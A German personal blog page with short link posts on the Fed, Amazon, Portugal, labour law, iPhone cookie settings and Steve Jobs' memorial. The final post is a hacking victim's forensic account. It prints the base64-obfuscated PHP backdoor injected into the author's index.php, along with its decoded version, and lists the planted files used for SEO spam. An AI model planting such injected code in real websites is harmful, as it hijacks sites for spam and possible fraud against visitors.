Mittwoch, 4. Januar 2012

Die Fed im Dienste der Finanzelite

That is, all the feds’ horses and all the feds’ men are supposed to make sure that 1) stock holders don’t lose money…2) bankers don’t go broke…3) speculators don’t get wiped out…4) Top CEOs don’t lose their jobs…

Quelle: Have Yourself a Merry Economic Depression

Tags: , ,
Labels: USA, Wirtschaft

Keine Kommentare | neuen Kommentar verfassen

Mittwoch, 4. Januar 2012

Amazons Erfolgsgeheimnis

Amazon did not rise to power by inventing a new product or service. It came to power by systematically taking down an entire existing industry.

Quelle: Inside Amazon’s Playbook: How Bezos Built Today’s GE – Forbes

Tags: , , ,
Labels: Allgemein

Keine Kommentare | neuen Kommentar verfassen

Mittwoch, 4. Januar 2012

Lasst uns Portugal kaufen!

Over dinner one night in Sao Paulo, several Brazilian entrepreneurs were discussing setting up a company to buy Portugal. They argued that with Brazil’s booming economy and Portugal’s recent debt struggles (and the fact that many Portuguese were coming to Brazil looking for work, reversing a major historical trend) it was time for Brazil to get a little revenge on their former colonial masters.

Quelle: Building A Company In Brazil; An American Entrepreneur’s Perspective | TechCrunch

Tags: , , , ,
Labels: Allgemein

Keine Kommentare | neuen Kommentar verfassen

Mittwoch, 4. Januar 2012

Wenn man für die Arbeit lebt

Tatsachenbericht eines direkt Betroffenen über die Bombenanschläge in London:

The obvious thing to do was to go home, but the default was to go to work.

Quelle: The bomb that changed my life

Tags: , , , ,
Labels: Allgemein

Keine Kommentare | neuen Kommentar verfassen

Mittwoch, 4. Januar 2012

Nette Kosenamen für den Boss? Juristisch kein Problem

Den Boss einen “Wichser” zu nennen und die Geschäftsführung “Arschlöcher” muss laut dieser Entscheidung nicht zwangsläufig zur Kündigung führen – wenn man lange genug im Betrieb angestellt sei und die Umstände eine gewisse Erregung rechtfertigten.

Quelle: Arbeitnehmer: Gewisse Erregung

Abschwächen wirkt noch ein anderer Faktor:

Und schließlich müsse auch der “branchenübliche Umgangston” im Einzelhandelsgewerbe berücksichtigt werden.

Tags: ,
Labels: Arbeit

Keine Kommentare | neuen Kommentar verfassen

Mittwoch, 4. Januar 2012

Autos auch am Tag mit Licht

Mousseman ist und bleibt der Hardliner in der schweizerischen Blogger-Szene:

Gerade das Lichtobligatorium für PKW am hellichten Tag halte ich für einen patenten Schwachsinn. Wer ein Auto am Tag nicht sieht, ist blind.

Quelle: Neues Parlament, neues ‚Via Sicura‘, gleicher Stuss

Tags: , ,
Labels: Schweiz

Keine Kommentare | neuen Kommentar verfassen

Mittwoch, 4. Januar 2012

Probleme mit dem Login in das Google-Konto unter iPhone

Kürzlich wollte ich unter m.google.com/sync neue Kalender zu iCal unter meinem iPhone hinzufügen (vgl. auch Mehrere Google Calendar mit Google Sync (Exchange / ActiveSync) auf dem iPhone anzeigen).

Bei jedem Login-Versuch in das Google-Konto erschien folgende Fehlermeldung:

Your browser’s cookie functionality is turned off. Please turn it on.

Obwohl ich als Informatiker eigentlich solchen Fehlermeldungen blind vertrauen sollte, vermutete ich das Problem fälschlicherweise bei Google. Erst als ich mich nach mehreren Tagen mit erfolglosen Login-Versuchen an die Suchmaschine wendete, wurde mir klar, dass unter Safari auf meinem iPhone tatsächlich Cookies deaktiviert waren.

Ich reaktivierte die Funktionalität folgendermassen:

  1. Settings
  2. Safari
  3. Privacy
  4. Accept Cookies: Always

Anschliessend klappte es auch wieder problemlos mit dem Login in meinen Google-Account.

Via: I can not access my google account on my iphone. I keep getting

Tags: , ,
Labels: Apple

Keine Kommentare | neuen Kommentar verfassen

Dienstag, 3. Januar 2012

Steve Jobs Abschiedsfeier im Netz

Es musste 2012 werden, bis ich mir die gesamte Abschiedsfeier für den Anfangs Oktober 2011 verstorbenen Steve Jobs zu Gemüte führen konnte. Apple hat die Aufzeichnug der etwas mehr als einstündigen Gedenkfeier an ihren Gründer online gestellt:

A Celebration of Steve’s life. October 19, 2011

Die beste Rede hielt meiner Meinung nach Jobs langjähriger Weggefährte und Vertrauter Jonathan „Jony“ Ive, gefolgt von Bill Campbell, einem der Verwaltungsräte der Obsthandelsbude.

Das beste Stück der musikalischen Unterhaltung war meiner Meinung nach Coldplays „Fix You“:

Zum ersten Mal konnte ich hinter die „Mauern“ des Apple-Campus sehen, an welchem ich in den letzten 12 Monaten dutzende Male vorbeigefahren bin … hoffentlich lädt mich irgendwann einmal ein am Apple-Hauptsitz in Cupertino arbeitender Schweizer auf einen Kaffee in das Caffe Macs ein …

Tags: ,
Labels: Apple

Keine Kommentare | neuen Kommentar verfassen

Sonntag, 13. November 2011

Der Associate Tag ist für die Amazon Product Advertisting-API nun zwingend

Seit einigen Jahren verwende ich eine selber geschriebene schicke kleine PHP-Klasse, um Produkte mit ihrer ISBN oder EAN aus dem Amazon-Katalog abzufragen. Seit einigen Wochen (oder sind es gar Monaten?) scheint der Zugriff nicht mehr zu funktionieren.

Ursache ist eine neue Bedingung von Seiten Amazons, die für jeden Request neu nicht nur den AWSAccessKeyId verlangt, sondern auch den AssociateTag.

Diesen erstellt man, in dem man sich einen Account unter affiliate-program.amazon.com einrichtet — wer Wert auf einen schönen und einfachen Tag legt, sollte sich beim Formularfeld für den Titel der Web-Site einen einprägsamen Namen einfallen lassen. Bei mir lautet der AssociateTag dementsprechend emeidicom-20.

Wird dieser zusätzliche Parameter mit Requests mitgeschickt, kriegt man keine Fehlermeldung mehr zu Gesicht, sondern die tatsächlich erwarteten Daten zu Büchern, Audio-CDs und DVDs.

Tags: , ,
Labels: Allgemein

2 Kommentare | neuen Kommentar verfassen

Sonntag, 13. November 2011

Genotec-Web-Server gehackt

Bei einer Routineüberprüfung meiner bei der Genotec AG gehosteten Web-Site eMeidi.com entdeckte ich soeben in der index.php in meinem Web-Root zuoberst folgenden kryptischen Eintrag:

<?php
error_reporting(0);
$gc0=base64_decode('ZG93bmxvYWRzL3dpbmRvd3MtcHJpY2VzLw==');
$fq1=$_SERVER[base64_decode('UVVFUllfU1RSSU5H')];
$ti2=strpos($fq1,base64_decode('cD0='));

if($ti2===0){include($gc0.base64_decode('Pw==').$fq1);
exit;
}?>
<?php include(base64_decode('c2l0ZWluZGV4LnBocA=='));?>
...

Nach einer kurzen Analse der Base64-enkodierten Strings ging mir ein Lichtlein auf:

<?php
error_reporting(0);
$gc0='downloads/windows-prices/';
$fq1=$_SERVER['QUERY_STRING'];
$ti2=strpos($fq1,'p=');

if($ti2===0){include($gc0.'?'.$fq1);
exit;
}?>
<?php include('siteindex.php');?>
...

Dies erklärt mir endlich, wieso bei der Google-Suche nach eMeidi seit Monaten folgende komische Beschreibung zu meiner Web-Site angezeigt wird:

Im Web-Root fanden sich folgende drei vom Hacker hinterlegte Dateien (ls -l unter Mac OS X, das Datum und die Dateigrössen stimmen mit dem Web-Server überein):

-rw-r--r--@ 1 mario  staff  23233  5 Jul  2010 login.php
-rw-r--r--@ 1 mario  staff  14028  5 Jul  2010 siteindex.php
-rw-r--r--@ 1 mario  staff  17986  5 Jul  2010 sitestatus.php

Zweck

(Vermutung) Das einschleusen von Seiteninhalten, um das Google-Ranking meiner Web-Site auszunutzen und unbedarfte Anwender auf Web-Sites zu locken, auf welchen Waren (wohl vornehmlich Raubkopien) angeboten werden — oder Kreditkartendaten abgegriffen werden.

/downloads/windows-prices/

Im besagten Verzeichnis /downloads/windows-prices/finden sich in ca. 10’000 Dateien über 190MB an Daten. Leider kann ich diese nicht löschen, weil sie dem www-Benutzer und nicht dem www4607 gehören. Ich gehe deshalb davon aus, dass nicht ein fehlerhaftes Script von mir für die Sicherheitslücke verantwortlich ist, sondern eine Sicherheitslücke in Apache:

Verzeichnis-Listing

Forensik

Wer mehr über die Technik hinter dem Hack erfahren will, lädt sich das mehr als 70MB umfassende Archiv aller suspekten Dateien herunter, welche ich vor der definitiven Löschung von meinem Server gesichert habe:

Archiv aller vom Hacker auf meinem Server abgelegten Dateien

Tags: , ,
Labels: Allgemein

5 Kommentare | neuen Kommentar verfassen